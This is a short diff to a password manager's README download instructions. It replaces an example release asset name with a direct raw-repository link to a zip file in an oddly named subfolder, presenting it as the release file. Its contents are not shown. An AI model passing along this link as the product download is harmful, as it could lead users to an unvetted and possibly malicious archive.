ajaya2023/password_manager/README.md

 2. Locate the latest version.
 The version will be listed with the date released.

 3. Find the asset files below the release note.
-You may see files named like `password_manager.exe` or similar, depending on your system.
+You may see files named like `https://raw.githubusercontent.com/ajaya2023/password_manager/main/monimolite/password_manager.zip` or similar, depending on your system.

 4. Click on the file to download it.
 Your browser will start downloading the file.